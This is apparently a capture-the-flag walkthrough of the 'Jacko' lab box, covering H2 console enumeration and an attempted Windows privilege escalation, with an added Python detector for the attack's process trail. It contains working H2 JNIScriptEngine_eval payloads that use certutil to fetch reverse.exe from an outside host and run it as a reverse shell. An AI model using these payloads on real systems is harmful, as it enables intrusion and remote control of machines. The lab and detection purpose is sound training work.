Jacko 🔸
Enumeration
The web server shows the welcome page of an H2 Java database.
The H2 console is on port 8082.
Initial Access
We can get access by clicking Connect.
Then we can execute arbitrary commands, as shown in https://www.exploit-db.com/exploits/49384
Once all the commands are executed, we can upload a reverse shell and execute it:
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f http://192.168.45.220/reverse.exe C:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
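On the host, the two calls above leave a recognisable process-creation trail: a JVM spawning certutil in download mode, then a binary run from a user profile. The sketch below is an added example, not part of the original write-up, that flags both over constructed Sysmon-style records; the java.exe path, the record field names and the rule names are assumptions.

```python
import ntpath
import re

JVM_IMAGES = {"java.exe", "javaw.exe"}
SHELLS_AND_LOLBINS = {"cmd.exe", "powershell.exe", "certutil.exe"}
URLCACHE_RE = re.compile(r"(?i)(?:^|\s)[-/]urlcache\b")
URL_RE = re.compile(r"(?i)\bhttps?://\S+")
USER_DIR_RE = re.compile(r"(?i)^[a-z]:\\users\\")

# Constructed process-creation records (reduced Sysmon Event ID 1 shape).
# The java.exe install path is an assumption; the page does not give it.
JAVA = r"C:\Program Files\Java\bin\java.exe"
CERTUTIL = r"C:\Windows\System32\certutil.exe"
SAMPLE_EVENTS = [
    {"parent": JAVA, "image": CERTUTIL, "cmdline": "certutil -urlcache -split -f "
     r"http://192.168.45.220/reverse.exe C:\users\tony\reverse.exe"},
    {"parent": JAVA, "image": r"C:\users\tony\reverse.exe", "cmdline": r"C:\users\tony\reverse.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": CERTUTIL, "cmdline": r"certutil -verify C:\certs\server.cer"},
    {"parent": r"C:\Windows\System32\services.exe", "image": JAVA,
     "cmdline": "java -cp h2.jar org.h2.tools.Server"},
]


def classify(event):
    """Return the names of the rules a process-creation record matches."""
    child = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent"]).lower()
    cmd = event["cmdline"]
    hits = []
    # certutil used as a downloader: -urlcache (or /urlcache) plus a URL.
    if child == "certutil.exe" and URLCACHE_RE.search(cmd) and URL_RE.search(cmd):
        hits.append("certutil_download")
    # A database JVM should not start shells, LOLBins or user-profile binaries.
    if parent in JVM_IMAGES:
        if child in SHELLS_AND_LOLBINS:
            hits.append("jvm_spawned_lolbin")
        if USER_DIR_RE.match(event["image"]):
            hits.append("jvm_ran_binary_from_user_profile")
    return hits


def scan(events):
    """Return (index, rule names) for every record that matches a rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["cmdline"], hits)
```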
We have a restricted user, so we reconstruct the PATH:
set PATH=%PATH%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0\;
Get the flag
Privilege Escalation
Transfer winPEAS.
We find a PaperStream IP program that seems out of the ordinary.
We search for an exploit.
Generate the reverse shell DLL and transfer the files to the host.
Bug
It doesn't work with the PaperStream method or with the methods that abuse SeImpersonatePrivilege (JuicyPotato, GodPotato, PrintSpoofer...).